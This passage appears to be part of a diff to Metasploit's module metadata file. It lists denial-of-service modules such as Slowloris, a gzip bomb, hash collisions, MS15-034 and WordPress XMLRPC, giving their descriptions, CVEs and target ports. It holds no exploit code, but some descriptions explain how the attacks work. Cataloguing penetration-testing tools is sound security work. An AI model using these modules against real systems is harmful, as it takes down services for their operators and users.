The vulnerability\n exists due to a boundary error within the handling of POST requests,\n where the application input is set to an overly long file name.\n This module will crash the web server, however it is likely exploitable\n under certain conditions.", + "references": [ + "URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html", + "BID-9750", + "OSVDB-4077", + "CVE-2004-0331" + ], + "platform": "", + "arch": "", + "rport": 1311, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb", + "is_install_path": true, + "ref_name": "dos/http/dell_openmanage_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/f5_bigip_apm_max_sessions": { + "name": "F5 BigIP Access Policy Manager Session Exhaustion Denial of Service", + "fullname": "auxiliary/dos/http/f5_bigip_apm_max_sessions", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Denis Kolegov ", + "Oleg Broslavsky ", + "Nikita Oleksov " + ], + "description": "This module exploits a resource exhaustion denial of service in F5 BigIP devices. An\n unauthenticated attacker can establish multiple connections with BigIP Access Policy\n Manager (APM) and exhaust all available sessions defined in customer license. In the\n first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP\n system creates a session, marks it as pending and then redirects the client to an access\n policy URI. 
Since BigIP allocates a new session after the first unauthenticated request,\n and deletes the session only if an access policy timeout expires, the attacker can exhaust\n all available sessions by repeatedly sending the initial HTTP request and leaving the\n sessions as pending.", + "references": [ + "URL-https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb", + "is_install_path": true, + "ref_name": "dos/http/f5_bigip_apm_max_sessions", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/flexense_http_server_dos": { + "name": "Flexense HTTP Server Denial Of Service", + "fullname": "auxiliary/dos/http/flexense_http_server_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-03-09", + "type": "auxiliary", + "author": [ + "Ege Balci " + ], + "description": "This module triggers a Denial of Service vulnerability in the Flexense HTTP server.\n Vulnerability caused by a user mode write access memory violation and can be triggered with\n rapidly sending variety of HTTP requests with long HTTP header values.\n\n Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.", + "references": [ + "CVE-2018-8065", + "URL-https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": 
"/modules/auxiliary/dos/http/flexense_http_server_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/flexense_http_server_dos", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/gzip_bomb_dos": { + "name": "Gzip Memory Bomb Denial Of Service", + "fullname": "auxiliary/dos/http/gzip_bomb_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-01-01", + "type": "auxiliary", + "author": [ + "info ", + "joev " + ], + "description": "This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.\n Many applications will not implement a length limit check and will eat up all memory and\n eventually die. This can also be used to kill systems that download/parse content from\n a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).\n\n A FILEPATH datastore option can also be provided to save the .gz bomb locally.\n\n Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly\n deflate multiple rounds of gzip on a file. 
Setting ROUNDS=3 and SIZE=10240 (default value)\n will generate a 300 byte gzipped file that expands to 10GB.", + "references": [ + "URL-http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/gzip_bomb_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/gzip_bomb_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Host file via web server" + } + ] + }, + "auxiliary_dos/http/hashcollision_dos": { + "name": "Hashtable Collisions", + "fullname": "auxiliary/dos/http/hashcollision_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-12-28", + "type": "auxiliary", + "author": [ + "Alexander Klink", + "Julian Waelde", + "Scott A. Crosby", + "Dan S. Wallach", + "Krzysztof Kotowicz", + "Christian Mehlmauer " + ], + "description": "This module uses a denial-of-service (DoS) condition appearing in a variety of\n programming languages. This vulnerability occurs when storing multiple values\n in a hash table and all values have the same hash value. 
This can cause a web server\n parsing the POST parameters issued with a request into a hash table to consume\n hours of CPU with a single HTTP request.\n\n Currently, only the hash functions for PHP and Java are implemented.\n This module was tested with PHP + httpd, Tomcat, Glassfish and Geronimo.\n It also generates a random payload to bypass some IDS signatures.", + "references": [ + "URL-http://ocert.org/advisories/ocert-2011-003.html", + "URL-https://web.archive.org/web/20120105151644/http://www.nruns.com/_downloads/advisory28122011.pdf", + "URL-https://fahrplan.events.ccc.de/congress/2011/Fahrplan/events/4680.en.html", + "URL-https://fahrplan.events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf", + "URL-https://www.youtube.com/watch?v=R2Cq3CLI6H8", + "CVE-2011-5034", + "CVE-2011-5035", + "CVE-2011-4885", + "CVE-2011-4858" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/hashcollision_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/hashcollision_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/ibm_lotus_notes": { + "name": "IBM Notes encodeURI DOS", + "fullname": "auxiliary/dos/http/ibm_lotus_notes", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-08-31", + "type": "auxiliary", + "author": [ + "Dhiraj Mishra" + ], + "description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, it could cause the Notes client to hang and have to be restarted.", + "references": [ + "EDB-42602", + "CVE-2017-1129", + 
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21999385" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/auxiliary/dos/http/ibm_lotus_notes.rb", + "is_install_path": true, + "ref_name": "dos/http/ibm_lotus_notes", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/http/ibm_lotus_notes2": { + "name": "IBM Notes Denial Of Service", + "fullname": "auxiliary/dos/http/ibm_lotus_notes2", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-08-31", + "type": "auxiliary", + "author": [ + "Dhiraj Mishra" + ], + "description": "This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.\n If successful, the browser will crash after viewing the webpage.", + "references": [ + "EDB-42604", + "CVE-2017-1130" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/ibm_lotus_notes2.rb", + "is_install_path": true, + "ref_name": "dos/http/ibm_lotus_notes2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/http/marked_redos": { + "name": "marked npm module \"heading\" ReDoS", + "fullname": "auxiliary/dos/http/marked_redos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Adam Cazzolla, Sonatype Security Research", + "Nick Starke, Sonatype Security Research" + ], + "description": "This 
module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.", + "references": [ + "URL-https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not", + "CWE-400" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2018-08-16 14:59:32 +0000", + "path": "/modules/auxiliary/dos/http/marked_redos.rb", + "is_install_path": true, + "ref_name": "dos/http/marked_redos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/metasploit_httphandler_dos": { + "name": "Metasploit HTTP(S) handler DoS", + "fullname": "auxiliary/dos/http/metasploit_httphandler_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-09-04", + "type": "auxiliary", + "author": [ + "Jose Garduno, Dreamlab Technologies AG", + "Angelo Seiler, Dreamlab Technologies AG" + ], + "description": "This module exploits the Metasploit HTTP(S) handler by sending\n a specially crafted HTTP request that gets added as a resource handler.\n Resources (which come from the external connections) are evaluated as RegEx\n in the handler server. 
Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n Tested against Metasploit 5.0.20.", + "references": [ + "CVE-2019-5645" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2019-12-26 13:31:38 +0000", + "path": "/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/metasploit_httphandler_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/monkey_headers": { + "name": "Monkey HTTPD Header Parsing Denial of Service (DoS)", + "fullname": "auxiliary/dos/http/monkey_headers", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-30", + "type": "auxiliary", + "author": [ + "Doug Prostko " + ], + "description": "This module causes improper header parsing that leads to a segmentation fault\n due to a specially crafted HTTP request. 
Affects version <= 1.2.0.", + "references": [ + "CVE-2013-3843", + "OSVDB-93853", + "BID-60333" + ], + "platform": "", + "arch": "", + "rport": 2001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/monkey_headers.rb", + "is_install_path": true, + "ref_name": "dos/http/monkey_headers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/ms15_034_ulonglongadd": { + "name": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service", + "fullname": "auxiliary/dos/http/ms15_034_ulonglongadd", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Bill Finlayson", + "sinn3r " + ], + "description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. 
This module will try to cause a denial-of-service.", + "references": [ + "CVE-2015-1635", + "MSB-MS15-034", + "URL-https://pastebin.com/ypURDPc4", + "URL-https://github.com/rapid7/metasploit-framework/pull/5150", + "URL-https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection", + "URL-http://www.securitysift.com/an-analysis-of-ms15-034/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb", + "is_install_path": true, + "ref_name": "dos/http/ms15_034_ulonglongadd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/nodejs_pipelining": { + "name": "Node.js HTTP Pipelining Denial of Service", + "fullname": "auxiliary/dos/http/nodejs_pipelining", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-18", + "type": "auxiliary", + "author": [ + "Marek Majkowski", + "titanous", + "joev " + ], + "description": "This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions\n released before 0.10.21 and 0.8.26. 
The attack sends many pipelined\n HTTP requests on a single connection, which causes unbounded memory\n allocation when the client does not read the responses.", + "references": [ + "CVE-2013-4450", + "OSVDB-98724", + "BID-63229", + "URL-https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb", + "is_install_path": true, + "ref_name": "dos/http/nodejs_pipelining", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/novell_file_reporter_heap_bof": { + "name": "NFR Agent Heap Overflow Vulnerability", + "fullname": "auxiliary/dos/http/novell_file_reporter_heap_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-16", + "type": "auxiliary", + "author": [ + "juan vazquez " + ], + "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n File Reporter (NFR). 
The vulnerability occurs when handling requests of name \"SRS\",\n where NFRAgent.exe fails to generate a response in a secure way, copying user\n controlled data into a fixed-length buffer in the heap without bounds checking.\n This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).", + "references": [ + "CVE-2012-4956", + "URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/" + ], + "platform": "", + "arch": "", + "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb", + "is_install_path": true, + "ref_name": "dos/http/novell_file_reporter_heap_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/rails_action_view": { + "name": "Ruby on Rails Action View MIME Memory Exhaustion", + "fullname": "auxiliary/dos/http/rails_action_view", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-12-04", + "type": "auxiliary", + "author": [ + "Toby Hsieh", + "joev ", + "sinn3r " + ], + "description": "This module exploits a Denial of Service (DoS) condition in Action View that requires\n a controller action. 
By sending a specially crafted content-type header to a Rails\n application, it is possible for it to store the invalid MIME type, and may eventually\n consume all memory if enough invalid MIMEs are given.\n\n Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.", + "references": [ + "CVE-2013-6414", + "OSVDB-100525", + "BID-64074", + "URL-https://seclists.org/oss-sec/2013/q4/400", + "URL-https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/rails_action_view.rb", + "is_install_path": true, + "ref_name": "dos/http/rails_action_view", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/rails_json_float_dos": { + "name": "Ruby on Rails JSON Processor Floating Point Heap Overflow DoS", + "fullname": "auxiliary/dos/http/rails_json_float_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-22", + "type": "auxiliary", + "author": [ + "Charlie Somerville", + "joev ", + "todb " + ], + "description": "When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. 
Other versions of Ruby are reported to be affected.", + "references": [ + "CVE-2013-4164", + "OSVDB-100113", + "URL-https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/rails_json_float_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/slowloris": { + "name": "Slowloris Denial of Service Attack", + "fullname": "auxiliary/dos/http/slowloris", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-06-17", + "type": "auxiliary", + "author": [ + "RSnake", + "Gokberk Yaltirakli", + "Daniel Teixeira", + "Matthew Kienow " + ], + "description": "Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.\n It accomplishes this by opening connections to the target web server and sending a partial request.\n Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.\n Affected servers will keep these connections open, filling their maximum concurrent connection pool,\n eventually denying additional connection attempts from clients.", + "references": [ + "CVE-2007-6750", + "CVE-2010-2227", + "EDB-8976", + "URL-https://github.com/gkbrk/slowloris" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-29 00:51:56 +0000", + "path": "/modules/auxiliary/dos/http/slowloris.py", + "is_install_path": true, + "ref_name": "dos/http/slowloris", + "check": false, + "post_auth": 
false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/sonicwall_ssl_format": { + "name": "SonicWALL SSL-VPN Format String Vulnerability", + "fullname": "auxiliary/dos/http/sonicwall_ssl_format", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-05-29", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "There is a format string vulnerability within the SonicWALL\n SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory\n can be read or written to, depending on the format string used.\n There appears to be a length limit of 127 characters of format\n string data. With physical access to the device and debugging,\n this module may be able to be used to execute arbitrary code remotely.", + "references": [ + "BID-35145", + "OSVDB-54881", + "URL-http://www.aushack.com/200905-sonicwall.txt" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb", + "is_install_path": true, + "ref_name": "dos/http/sonicwall_ssl_format", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/squid_range_dos": { + "name": "Squid Proxy Range Header DoS", + "fullname": "auxiliary/dos/http/squid_range_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-05-27", + "type": "auxiliary", + "author": [ + "Joshua Rogers" + ], + "description": "The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and\n 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered\n by specific HTTP requests and responses.\n\n These vulnerabilities allow remote attackers to cause 
a\n denial of service through specifically crafted requests.", + "references": [ + "CVE-2021-31806", + "CVE-2021-31807", + "URL-https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/" + ], + "platform": "", + "arch": "", + "rport": 3128, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2021-10-21 19:15:30 +0000", + "path": "/modules/auxiliary/dos/http/squid_range_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/squid_range_dos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "DOS", + "description": "Perform Denial of Service Against The Target" + } + ] + }, + "auxiliary_dos/http/tautulli_shutdown_exec": { + "name": "Tautulli v2.1.9 - Shutdown Denial of Service", + "fullname": "auxiliary/dos/http/tautulli_shutdown_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ismail Tasdelen" + ], + "description": "Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.", + "references": [ + "CVE-2019-19833", + "EDB-47785" + ], + "platform": "", + "arch": "", + "rport": 8181, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb", + "is_install_path": true, + "ref_name": "dos/http/tautulli_shutdown_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + 
"auxiliary_dos/http/ua_parser_js_redos": { + "name": "ua-parser-js npm module ReDoS", + "fullname": "auxiliary/dos/http/ua_parser_js_redos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Ryan Knell, Sonatype Security Research", + "Nick Starke, Sonatype Security Research" + ], + "description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"ua-parser-js\". Server-side applications that use\n \"ua-parser-js\" for parsing the browser user-agent string will be vulnerable\n if they call the \"getOS\" or \"getResult\" functions. This vulnerability was\n fixed as of version 0.7.16.", + "references": [ + "CVE-2017-16086", + "URL-https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79", + "CWE-400" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2018-07-12 17:34:52 +0000", + "path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb", + "is_install_path": true, + "ref_name": "dos/http/ua_parser_js_redos", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/webkitplus": { + "name": "WebKitGTK+ WebKitFaviconDatabase DoS", + "fullname": "auxiliary/dos/http/webkitplus", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-06-03", + "type": "auxiliary", + "author": [ + "Dhiraj Mishra", + "Hardik Mehta", + "Zubin Devnani", + "Manuel Caballero" + ], + "description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.", + "references": [ + "EDB-44842", + "CVE-2018-11646", + 
"URL-https://bugs.webkit.org/show_bug.cgi?id=186164", + "URL-https://www.inputzero.io/2018/06/cve-2018-11646-webkit.html" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/webkitplus.rb", + "is_install_path": true, + "ref_name": "dos/http/webkitplus", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_dos/http/webrick_regex": { + "name": "Ruby WEBrick::HTTP::DefaultFileHandler DoS", + "fullname": "auxiliary/dos/http/webrick_regex", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-08-08", + "type": "auxiliary", + "author": [ + "kris katterjohn " + ], + "description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.", + "references": [ + "BID-30644", + "CVE-2008-3656", + "OSVDB-47471", + "URL-http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/dos/http/webrick_regex.rb", + "is_install_path": true, + "ref_name": "dos/http/webrick_regex", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/wordpress_directory_traversal_dos": { + "name": "WordPress Traversal Directory DoS", + "fullname": 
"auxiliary/dos/http/wordpress_directory_traversal_dos", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Yorick Koster", + "CryptisStudents" + ], + "description": "Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin\n function in wp-admin/includes/ajax-actions.php in WordPress before 4.6\n allows remote attackers to hijack the authentication of subscribers\n for /dev/random read operations by leveraging a late call to\n the check_ajax_referer function, a related issue to CVE-2016-6896.", + "references": [ + "CVE-2016-6897", + "EDB-40288", + "OVE-OVE-20160712-0036" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/wordpress_directory_traversal_dos", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/wordpress_long_password_dos": { + "name": "WordPress Long Password DoS", + "fullname": "auxiliary/dos/http/wordpress_long_password_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-20", + "type": "auxiliary", + "author": [ + "Javier Nieto Arevalo", + "Andres Rojas Guerrero", + "rastating" + ], + "description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.", + "references": [ + "CVE-2014-9016", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2014-9034", + "OSVDB-114857", + "WPVDB-7681" + ], + "platform": "", + "arch": "", + "rport": 80, + 
"autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb", + "is_install_path": true, + "ref_name": "dos/http/wordpress_long_password_dos", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_dos/http/wordpress_xmlrpc_dos": { + "name": "Wordpress XMLRPC DoS", + "fullname": "auxiliary/dos/http/wordpress_xmlrpc_dos", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-08-06", + "type": "auxiliary", + "author": [ + "Nir Goldshlager", + "Christian Mehlmauer " + ], + "description": "Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.\n This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are\n also patched).", + "references": [ + "CVE-2014-5266", + "URL-https://wordpress.org/news/2014/08/wordpress-3-9-2/", + "URL-http://www.breaksec.com/?p=6362", + "URL-https://mashable.com/archive/wordpress-xml-blowup-dos", + "URL-https://core.trac.wordpress.org/changeset/29404", + "WPVDB-7526" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": 